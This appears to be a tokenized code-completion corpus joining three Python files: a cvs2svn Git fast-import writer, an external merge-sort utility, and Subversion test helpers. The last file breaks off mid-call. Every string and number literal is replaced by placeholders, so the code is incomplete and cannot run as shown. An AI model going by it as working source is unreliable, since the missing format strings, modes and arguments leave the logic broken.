cvs_item . cvs_file . cvs_path , ) <EOL> ) <EOL> if isinstance ( cvs_item , CVSSymbol ) : <EOL> cvs_rev = cvs_item . get_cvs_revision_source ( Ctx ( ) . _cvs_items_db ) <EOL> else : <EOL> cvs_rev = cvs_item <EOL> fulltext = self . revision_reader . get_content ( cvs_rev ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( fulltext ) , ) ) <EOL> self . f . write ( fulltext ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> def finish ( self ) : <EOL> GitRevisionWriter . 
finish ( self ) <EOL> self . revision_reader . finish ( ) <EOL> class GitOutputOption ( DVCSOutputOption ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> _first_commit_mark = <NUM_LIT> <EOL> def __init__ ( <EOL> self , revision_writer , <EOL> dump_filename = None , <EOL> author_transforms = None , <EOL> tie_tag_fixup_branches = False , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> DVCSOutputOption . __init__ ( self ) <EOL> self . dump_filename = dump_filename <EOL> self . revision_writer = revision_writer <EOL> self . author_transforms = self . normalize_author_transforms ( <EOL> author_transforms <EOL> ) <EOL> self . tie_tag_fixup_branches = tie_tag_fixup_branches <EOL> self . _mark_generator = KeyGenerator ( GitOutputOption . _first_commit_mark ) <EOL> def register_artifacts ( self , which_pass ) : <EOL> DVCSOutputOption . register_artifacts ( self , which_pass ) <EOL> self . revision_writer . register_artifacts ( which_pass ) <EOL> def check_symbols ( self , symbol_map ) : <EOL> pass <EOL> def setup ( self , svn_rev_count ) : <EOL> DVCSOutputOption . setup ( self , svn_rev_count ) <EOL> if self . dump_filename is None : <EOL> self . f = sys . stdout <EOL> else : <EOL> self . f = open ( self . dump_filename , '<STR_LIT:wb>' ) <EOL> self . _youngest = <NUM_LIT:0> <EOL> self . _marks = { } <EOL> self . revision_writer . start ( self . _mirror , self . f ) <EOL> def _create_commit_mark ( self , lod , revnum ) : <EOL> mark = self . _mark_generator . gen_id ( ) <EOL> self . _set_lod_mark ( lod , revnum , mark ) <EOL> return mark <EOL> def _set_lod_mark ( self , lod , revnum , mark ) : <EOL> """<STR_LIT>""" <EOL> assert revnum >= self . _youngest <EOL> entry = ( revnum , mark ) <EOL> try : <EOL> modifications = self . _marks [ lod ] <EOL> except KeyError : <EOL> self . _marks [ lod ] = [ entry ] <EOL> else : <EOL> if modifications [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] == revnum : <EOL> modifications [ - <NUM_LIT:1> ] = entry <EOL> else : <EOL> modifications . 
append ( entry ) <EOL> self . _youngest = revnum <EOL> def _get_author ( self , svn_commit ) : <EOL> """<STR_LIT>""" <EOL> cvs_author = svn_commit . get_author ( ) <EOL> return self . _map_author ( cvs_author ) <EOL> def _map_author ( self , cvs_author ) : <EOL> return self . author_transforms . get ( cvs_author , "<STR_LIT>" % ( cvs_author , ) ) <EOL> @ staticmethod <EOL> def _get_log_msg ( svn_commit ) : <EOL> return svn_commit . get_log_msg ( ) <EOL> def process_initial_project_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> self . _mirror . end_commit ( ) <EOL> def process_primary_commit ( self , svn_commit ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . _get_log_msg ( svn_commit ) <EOL> lods = set ( ) <EOL> for cvs_rev in svn_commit . get_cvs_items ( ) : <EOL> lods . add ( cvs_rev . lod ) <EOL> if len ( lods ) != <NUM_LIT:1> : <EOL> raise InternalError ( '<STR_LIT>' % ( len ( lods ) , ) ) <EOL> lod = lods . pop ( ) <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> if isinstance ( lod , Trunk ) : <EOL> self . f . write ( '<STR_LIT>' ) <EOL> else : <EOL> self . f . write ( '<STR_LIT>' % ( lod . name , ) ) <EOL> mark = self . _create_commit_mark ( lod , svn_commit . revnum ) <EOL> logger . normal ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . revnum , lod , mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' % ( author , svn_commit . date , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> for cvs_rev in svn_commit . get_cvs_items ( ) : <EOL> self . revision_writer . process_revision ( cvs_rev , post_commit = False ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def process_post_commit ( self , svn_commit ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . 
_get_log_msg ( svn_commit ) <EOL> source_lods = set ( ) <EOL> for cvs_rev in svn_commit . cvs_revs : <EOL> source_lods . add ( cvs_rev . lod ) <EOL> if len ( source_lods ) != <NUM_LIT:1> : <EOL> raise InternalError ( '<STR_LIT>' % ( len ( source_lods ) , ) ) <EOL> source_lod = source_lods . pop ( ) <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> self . f . write ( '<STR_LIT>' ) <EOL> mark = self . _create_commit_mark ( None , svn_commit . revnum ) <EOL> logger . normal ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . revnum , mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' % ( author , svn_commit . date , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( self . _get_source_mark ( source_lod , svn_commit . revnum ) , ) <EOL> ) <EOL> for cvs_rev in svn_commit . cvs_revs : <EOL> self . revision_writer . process_revision ( cvs_rev , post_commit = True ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def _get_source_mark ( self , source_lod , revnum ) : <EOL> """<STR_LIT>""" <EOL> modifications = self . _marks [ source_lod ] <EOL> i = bisect . bisect_left ( modifications , ( revnum + <NUM_LIT:1> , ) ) - <NUM_LIT:1> <EOL> ( revnum , mark ) = modifications [ i ] <EOL> return mark <EOL> def describe_lod_to_user ( self , lod ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( lod , Trunk ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return lod . name <EOL> def _describe_commit ( self , svn_commit , lod ) : <EOL> author = self . _map_author ( svn_commit . get_author ( ) ) <EOL> if author . endswith ( "<STR_LIT>" ) : <EOL> author = author [ : - <NUM_LIT:3> ] <EOL> date = time . strftime ( <EOL> "<STR_LIT>" , time . gmtime ( svn_commit . date ) <EOL> ) <EOL> log_msg = svn_commit . get_log_msg ( ) <EOL> if log_msg . 
find ( '<STR_LIT:\n>' ) != - <NUM_LIT:1> : <EOL> log_msg = log_msg [ : log_msg . index ( '<STR_LIT:\n>' ) ] <EOL> return "<STR_LIT>" % ( <EOL> self . describe_lod_to_user ( lod ) , date , author , log_msg , ) <EOL> def _process_symbol_commit ( self , svn_commit , git_branch , source_groups ) : <EOL> author = self . _get_author ( svn_commit ) <EOL> log_msg = self . _get_log_msg ( svn_commit ) <EOL> is_initial_lod_creation = svn_commit . symbol not in self . _marks <EOL> mark = self . _create_commit_mark ( svn_commit . symbol , svn_commit . revnum ) <EOL> if is_initial_lod_creation : <EOL> p_source_revnum , p_source_lod , p_cvs_symbols = source_groups [ <NUM_LIT:0> ] <EOL> try : <EOL> p_source_node = self . _mirror . get_old_lod_directory ( <EOL> p_source_lod , p_source_revnum <EOL> ) <EOL> except KeyError : <EOL> raise InternalError ( '<STR_LIT>' % ( p_source_lod , ) ) <EOL> cvs_files_to_delete = set ( self . _get_all_files ( p_source_node ) ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups : <EOL> for cvs_symbol in cvs_symbols : <EOL> cvs_files_to_delete . discard ( cvs_symbol . cvs_file ) <EOL> log_msg += "<STR_LIT:\n>" <EOL> if is_initial_lod_creation : <EOL> log_msg += "<STR_LIT>" % ( <EOL> self . _describe_commit ( <EOL> Ctx ( ) . _persistence_manager . get_svn_commit ( p_source_revnum ) , <EOL> p_source_lod <EOL> ) , <EOL> ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups [ ( is_initial_lod_creation and <NUM_LIT:1> or <NUM_LIT:0> ) : ] : <EOL> log_msg += "<STR_LIT>" % ( <EOL> self . _describe_commit ( <EOL> Ctx ( ) . _persistence_manager . get_svn_commit ( source_revnum ) , <EOL> source_lod <EOL> ) , <EOL> ) <EOL> for cvs_path in sorted ( <EOL> cvs_symbol . cvs_file . cvs_path for cvs_symbol in cvs_symbols <EOL> ) : <EOL> log_msg += "<STR_LIT>" % ( cvs_path , ) <EOL> if is_initial_lod_creation : <EOL> if cvs_files_to_delete : <EOL> log_msg += "<STR_LIT>" <EOL> for cvs_path in sorted ( <EOL> cvs_file . 
cvs_path for cvs_file in cvs_files_to_delete <EOL> ) : <EOL> log_msg += "<STR_LIT>" % ( cvs_path , ) <EOL> self . f . write ( '<STR_LIT>' % ( git_branch , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( author , svn_commit . date , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> if is_initial_lod_creation : <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( self . _get_source_mark ( p_source_lod , p_source_revnum ) , ) <EOL> ) <EOL> for ( source_revnum , source_lod , cvs_symbols , ) in source_groups : <EOL> for cvs_symbol in cvs_symbols : <EOL> self . revision_writer . branch_file ( cvs_symbol ) <EOL> if is_initial_lod_creation : <EOL> for cvs_file in cvs_files_to_delete : <EOL> self . f . write ( '<STR_LIT>' % ( cvs_file . cvs_path , ) ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> return mark <EOL> def process_branch_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> source_groups = self . _get_source_groups ( svn_commit ) <EOL> if self . _is_simple_copy ( svn_commit , source_groups ) : <EOL> ( source_revnum , source_lod , cvs_symbols ) = source_groups [ <NUM_LIT:0> ] <EOL> logger . debug ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . symbol , source_lod , source_revnum , ) <EOL> ) <EOL> mark = self . _get_source_mark ( source_lod , source_revnum ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . _mirror . copy_lod ( source_lod , svn_commit . symbol , source_revnum ) <EOL> self . _set_lod_mark ( svn_commit . symbol , svn_commit . revnum , mark ) <EOL> else : <EOL> logger . debug ( <EOL> '<STR_LIT>' % ( svn_commit . symbol , ) <EOL> ) <EOL> self . _process_symbol_commit ( <EOL> svn_commit , '<STR_LIT>' % ( svn_commit . symbol . name , ) , <EOL> source_groups , <EOL> ) <EOL> self . _mirror . 
end_commit ( ) <EOL> def _set_symbol ( self , symbol , mark ) : <EOL> if isinstance ( symbol , Branch ) : <EOL> category = '<STR_LIT>' <EOL> elif isinstance ( symbol , Tag ) : <EOL> category = '<STR_LIT>' <EOL> else : <EOL> raise InternalError ( ) <EOL> self . f . write ( '<STR_LIT>' % ( category , symbol . name , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark , ) ) <EOL> def get_tag_fixup_branch_name ( self , svn_commit ) : <EOL> return '<STR_LIT>' <EOL> def process_tag_commit ( self , svn_commit ) : <EOL> self . _mirror . start_commit ( svn_commit . revnum ) <EOL> source_groups = self . _get_source_groups ( svn_commit ) <EOL> if self . _is_simple_copy ( svn_commit , source_groups ) : <EOL> ( source_revnum , source_lod , cvs_symbols ) = source_groups [ <NUM_LIT:0> ] <EOL> logger . debug ( <EOL> '<STR_LIT>' <EOL> % ( svn_commit . symbol , source_lod , source_revnum , ) <EOL> ) <EOL> mark = self . _get_source_mark ( source_lod , source_revnum ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . _mirror . copy_lod ( source_lod , svn_commit . symbol , source_revnum ) <EOL> self . _set_lod_mark ( svn_commit . symbol , svn_commit . revnum , mark ) <EOL> else : <EOL> logger . debug ( <EOL> '<STR_LIT>' % ( svn_commit . symbol , ) <EOL> ) <EOL> fixup_branch_name = self . get_tag_fixup_branch_name ( svn_commit ) <EOL> mark = self . _process_symbol_commit ( <EOL> svn_commit , fixup_branch_name , source_groups <EOL> ) <EOL> self . _set_symbol ( svn_commit . symbol , mark ) <EOL> self . f . write ( '<STR_LIT>' % ( fixup_branch_name , ) ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> if self . tie_tag_fixup_branches : <EOL> source_lod = source_groups [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] <EOL> source_lod_git_branch = '<STR_LIT>' % ( getattr ( source_lod , '<STR_LIT:name>' , '<STR_LIT>' ) , ) <EOL> mark2 = self . _create_commit_mark ( source_lod , svn_commit . revnum ) <EOL> author = self . _map_author ( Ctx ( ) . username ) <EOL> log_msg = self . 
_get_log_msg_for_ancestry_tie ( svn_commit ) <EOL> self . f . write ( '<STR_LIT>' % ( source_lod_git_branch , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( mark2 , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( author , svn_commit . date , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( len ( log_msg ) , ) ) <EOL> self . f . write ( '<STR_LIT>' % ( log_msg , ) ) <EOL> self . f . write ( <EOL> '<STR_LIT>' <EOL> % ( mark , ) <EOL> ) <EOL> self . f . write ( '<STR_LIT:\n>' ) <EOL> self . _mirror . end_commit ( ) <EOL> def _get_log_msg_for_ancestry_tie ( self , svn_commit ) : <EOL> return Ctx ( ) . text_wrapper . fill ( <EOL> Ctx ( ) . tie_tag_ancestry_message % { <EOL> '<STR_LIT>' : svn_commit . symbol . name , <EOL> } <EOL> ) <EOL> def cleanup ( self ) : <EOL> DVCSOutputOption . cleanup ( self ) <EOL> self . revision_writer . finish ( ) <EOL> if self . dump_filename is not None : <EOL> self . f . close ( ) <EOL> del self . f </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import shutil <EOL> import heapq <EOL> import itertools <EOL> import tempfile <EOL> BUFSIZE = <NUM_LIT:64> * <NUM_LIT> <EOL> def get_default_max_merge ( ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> _SC_OPEN_MAX = os . sysconf ( '<STR_LIT>' ) <EOL> if _SC_OPEN_MAX == - <NUM_LIT:1> : <EOL> raise ValueError ( ) <EOL> return min ( _SC_OPEN_MAX // <NUM_LIT:2> , <NUM_LIT:100> ) <EOL> except : <EOL> return <NUM_LIT:50> <EOL> DEFAULT_MAX_MERGE = get_default_max_merge ( ) <EOL> def merge ( iterables , key = None ) : <EOL> """<STR_LIT>""" <EOL> if key is None : <EOL> key = lambda x : x <EOL> values = [ ] <EOL> for index , iterable in enumerate ( iterables ) : <EOL> try : <EOL> iterator = iter ( iterable ) <EOL> value = iterator . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> else : <EOL> values . append ( ( key ( value ) , index , value , iterator ) ) <EOL> heapq . heapify ( values ) <EOL> while values : <EOL> k , index , value , iterator = heapq . heappop ( values ) <EOL> yield value <EOL> try : <EOL> value = iterator . next ( ) <EOL> except StopIteration : <EOL> pass <EOL> else : <EOL> heapq . heappush ( values , ( key ( value ) , index , value , iterator ) ) <EOL> def merge_files_onepass ( input_filenames , output_filename , key = None ) : <EOL> """<STR_LIT>""" <EOL> input_filenames = list ( input_filenames ) <EOL> if len ( input_filenames ) == <NUM_LIT:1> : <EOL> shutil . move ( input_filenames [ <NUM_LIT:0> ] , output_filename ) <EOL> else : <EOL> output_file = file ( output_filename , '<STR_LIT:wb>' , BUFSIZE ) <EOL> try : <EOL> chunks = [ ] <EOL> try : <EOL> for input_filename in input_filenames : <EOL> chunks . append ( open ( input_filename , '<STR_LIT:rb>' , BUFSIZE ) ) <EOL> output_file . writelines ( merge ( chunks , key ) ) <EOL> finally : <EOL> for chunk in chunks : <EOL> try : <EOL> chunk . close ( ) <EOL> except : <EOL> pass <EOL> finally : <EOL> output_file . 
close ( ) <EOL> def _try_delete_files ( filenames ) : <EOL> """<STR_LIT>""" <EOL> for filename in filenames : <EOL> try : <EOL> os . remove ( filename ) <EOL> except : <EOL> pass <EOL> def tempfile_generator ( tempdirs = [ ] ) : <EOL> """<STR_LIT>""" <EOL> if tempdirs : <EOL> tempdirs = itertools . cycle ( tempdirs ) <EOL> else : <EOL> tempdirs = itertools . repeat ( tempfile . gettempdir ( ) ) <EOL> i = <NUM_LIT:0> <EOL> while True : <EOL> ( fd , filename ) = tempfile . mkstemp ( <EOL> '<STR_LIT>' , '<STR_LIT>' % ( i , ) , tempdirs . next ( ) , False <EOL> ) <EOL> os . close ( fd ) <EOL> yield filename <EOL> i += <NUM_LIT:1> <EOL> def _merge_file_generation ( <EOL> input_filenames , delete_inputs , key = None , <EOL> max_merge = DEFAULT_MAX_MERGE , tempfiles = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> if max_merge <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> if tempfiles is None : <EOL> tempfiles = tempfile_generator ( ) <EOL> filenames = list ( input_filenames ) <EOL> if len ( filenames ) <= <NUM_LIT:1> : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> while filenames : <EOL> group = filenames [ : max_merge ] <EOL> del filenames [ : max_merge ] <EOL> group_output = tempfiles . next ( ) <EOL> merge_files_onepass ( group , group_output , key = key ) <EOL> if delete_inputs : <EOL> _try_delete_files ( group ) <EOL> yield group_output <EOL> def merge_files ( <EOL> input_filenames , output_filename , key = None , delete_inputs = False , <EOL> max_merge = DEFAULT_MAX_MERGE , tempfiles = None , <EOL> ) : <EOL> """<STR_LIT>""" <EOL> filenames = list ( input_filenames ) <EOL> if not filenames : <EOL> open ( output_filename , '<STR_LIT:wb>' ) . 
close ( ) <EOL> else : <EOL> if tempfiles is None : <EOL> tempfiles = tempfile_generator ( ) <EOL> while len ( filenames ) > max_merge : <EOL> filenames = list ( <EOL> _merge_file_generation ( <EOL> filenames , delete_inputs , key = key , <EOL> max_merge = max_merge , tempfiles = tempfiles <EOL> ) <EOL> ) <EOL> delete_inputs = True <EOL> merge_files_onepass ( filenames , output_filename , key = key ) <EOL> if delete_inputs : <EOL> _try_delete_files ( filenames ) <EOL> def sort_file ( <EOL> input , output , key = None , <EOL> buffer_size = <NUM_LIT> , tempdirs = [ ] , max_merge = DEFAULT_MAX_MERGE , <EOL> ) : <EOL> tempfiles = tempfile_generator ( tempdirs ) <EOL> filenames = [ ] <EOL> input_file = file ( input , '<STR_LIT:rb>' , BUFSIZE ) <EOL> try : <EOL> try : <EOL> input_iterator = iter ( input_file ) <EOL> while True : <EOL> current_chunk = list ( itertools . islice ( input_iterator , buffer_size ) ) <EOL> if not current_chunk : <EOL> break <EOL> current_chunk . sort ( key = key ) <EOL> filename = tempfiles . next ( ) <EOL> filenames . append ( filename ) <EOL> f = open ( filename , '<STR_LIT>' , BUFSIZE ) <EOL> try : <EOL> f . writelines ( current_chunk ) <EOL> finally : <EOL> f . close ( ) <EOL> finally : <EOL> input_file . close ( ) <EOL> merge_files ( <EOL> filenames , output , key = key , <EOL> delete_inputs = True , max_merge = max_merge , tempfiles = tempfiles , <EOL> ) <EOL> finally : <EOL> _try_delete_files ( filenames ) </s>
<s> import os , shutil , re , sys , errno <EOL> import difflib , pprint , logging <EOL> import xml . parsers . expat <EOL> from xml . dom . minidom import parseString <EOL> if sys . version_info [ <NUM_LIT:0> ] >= <NUM_LIT:3> : <EOL> from io import StringIO <EOL> else : <EOL> from cStringIO import StringIO <EOL> import svntest <EOL> from svntest import main , verify , tree , wc <EOL> from svntest import Failure <EOL> logger = logging . getLogger ( ) <EOL> def _log_tree_state ( msg , actual , subtree = "<STR_LIT>" ) : <EOL> if subtree : <EOL> subtree += os . sep <EOL> o = StringIO ( ) <EOL> o . write ( msg + '<STR_LIT:\n>' ) <EOL> tree . dump_tree_script ( actual , subtree , stream = o ) <EOL> logger . warn ( o . getvalue ( ) ) <EOL> o . close ( ) <EOL> def no_sleep_for_timestamps ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> def do_sleep_for_timestamps ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def no_relocate_validation ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT:yes>' <EOL> def do_relocate_validation ( ) : <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> def setup_pristine_greek_repository ( ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( main . general_wc_dir ) : <EOL> os . makedirs ( main . general_wc_dir ) <EOL> if not os . path . exists ( main . general_repo_dir ) : <EOL> os . makedirs ( main . general_repo_dir ) <EOL> if not os . path . exists ( main . pristine_greek_repos_dir ) : <EOL> main . create_repos ( main . pristine_greek_repos_dir ) <EOL> if main . is_ra_type_dav ( ) : <EOL> authz_file = os . path . join ( main . work_dir , "<STR_LIT>" ) <EOL> main . file_write ( authz_file , "<STR_LIT>" ) <EOL> main . greek_state . write_to_disk ( main . greek_dump_dir ) <EOL> exit_code , output , errput = main . run_svn ( None , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> main . greek_dump_dir , <EOL> main . 
pristine_greek_repos_url ) <EOL> if len ( errput ) : <EOL> display_lines ( "<STR_LIT>" , <EOL> '<STR_LIT>' , None , errput ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> lastline = output . pop ( ) . strip ( ) <EOL> match = re . search ( "<STR_LIT>" , lastline ) <EOL> if not match : <EOL> logger . error ( "<STR_LIT>" ) <EOL> logger . error ( "<STR_LIT>" ) <EOL> logger . error ( lastline ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> output_tree = wc . State . from_commit ( output ) <EOL> expected_output_tree = main . greek_state . copy ( main . greek_dump_dir ) <EOL> expected_output_tree . tweak ( verb = '<STR_LIT>' , <EOL> contents = None ) <EOL> try : <EOL> expected_output_tree . compare_and_display ( '<STR_LIT>' , output_tree ) <EOL> except tree . SVNTreeUnequal : <EOL> verify . display_trees ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> expected_output_tree . old_tree ( ) , <EOL> output_tree . old_tree ( ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> error_msg = "<STR_LIT>" <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) <EOL> create_failing_hook ( main . pristine_greek_repos_dir , '<STR_LIT>' , error_msg ) <EOL> def guarantee_empty_repository ( path ) : <EOL> """<STR_LIT>""" <EOL> if path == main . pristine_greek_repos_dir : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . safe_rmtree ( path ) <EOL> main . create_repos ( path ) <EOL> def guarantee_greek_repository ( path , minor_version ) : <EOL> """<STR_LIT>""" <EOL> if path == main . pristine_greek_repos_dir : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . safe_rmtree ( path ) <EOL> if main . copy_repos ( main . pristine_greek_repos_dir , path , <NUM_LIT:1> , <NUM_LIT:1> , minor_version ) : <EOL> logger . error ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> main . 
chmod_tree ( path , <NUM_LIT:0> <NUM_LIT> , <NUM_LIT:0> <NUM_LIT> ) <EOL> def run_and_verify_atomic_ra_revprop_change ( message , <EOL> expected_stdout , <EOL> expected_stderr , <EOL> expected_exit , <EOL> url , revision , propname , <EOL> old_propval , propval , <EOL> want_error ) : <EOL> """<STR_LIT>""" <EOL> KEY_OLD_PROPVAL = "<STR_LIT>" <EOL> KEY_NEW_PROPVAL = "<STR_LIT:value>" <EOL> def skel_make_atom ( word ) : <EOL> return "<STR_LIT>" % ( len ( word ) , word ) <EOL> def make_proplist_skel_part ( nick , val ) : <EOL> if val is None : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" % ( skel_make_atom ( nick ) , skel_make_atom ( val ) ) <EOL> skel = "<STR_LIT>" % ( make_proplist_skel_part ( KEY_OLD_PROPVAL , old_propval ) , <EOL> make_proplist_skel_part ( KEY_NEW_PROPVAL , propval ) ) <EOL> exit_code , out , err = main . run_atomic_ra_revprop_change ( url , revision , <EOL> propname , skel , <EOL> want_error ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnlook ( message , expected_stdout , <EOL> expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnlook2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnlook2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnlook ( * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . 
verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnadmin ( message , expected_stdout , <EOL> expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnadmin2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnadmin2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> exit_code , out , err = main . run_svnadmin ( * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svnversion ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None and expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svnversion2 ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svnversion2 ( message , wc_dir , trail_url , <EOL> expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> if trail_url is None : <EOL> exit_code , out , err = main . run_svnversion ( wc_dir , * varargs ) <EOL> else : <EOL> exit_code , out , err = main . run_svnversion ( wc_dir , trail_url , * varargs ) <EOL> verify . verify_outputs ( "<STR_LIT>" , out , err , <EOL> expected_stdout , expected_stderr ) <EOL> verify . 
verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_svn ( message , expected_stdout , expected_stderr , * varargs ) : <EOL> """<STR_LIT>""" <EOL> expected_exit = <NUM_LIT:0> <EOL> if expected_stderr is not None : <EOL> if isinstance ( expected_stderr , verify . ExpectedOutput ) : <EOL> if not expected_stderr . matches ( [ ] ) : <EOL> expected_exit = <NUM_LIT:1> <EOL> elif expected_stderr != [ ] : <EOL> expected_exit = <NUM_LIT:1> <EOL> return run_and_verify_svn2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) <EOL> def run_and_verify_svn2 ( message , expected_stdout , expected_stderr , <EOL> expected_exit , * varargs ) : <EOL> """<STR_LIT>""" <EOL> if expected_stderr is None : <EOL> raise verify . SVNIncorrectDatatype ( "<STR_LIT>" ) <EOL> want_err = None <EOL> if isinstance ( expected_stderr , verify . ExpectedOutput ) : <EOL> if not expected_stderr . matches ( [ ] ) : <EOL> want_err = True <EOL> elif expected_stderr != [ ] : <EOL> want_err = True <EOL> exit_code , out , err = main . run_svn ( want_err , * varargs ) <EOL> verify . verify_outputs ( message , out , err , expected_stdout , expected_stderr ) <EOL> verify . verify_exit_code ( message , exit_code , expected_exit ) <EOL> return exit_code , out , err <EOL> def run_and_verify_load ( repo_dir , dump_file_content , <EOL> bypass_prop_validation = False ) : <EOL> "<STR_LIT>" <EOL> if not isinstance ( dump_file_content , list ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> expected_stderr = [ ] <EOL> if bypass_prop_validation : <EOL> exit_code , output , errput = main . run_command_stdin ( <EOL> main . svnadmin_binary , expected_stderr , <NUM_LIT:0> , <NUM_LIT:1> , dump_file_content , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo_dir ) <EOL> else : <EOL> exit_code , output , errput = main . run_command_stdin ( <EOL> main . 
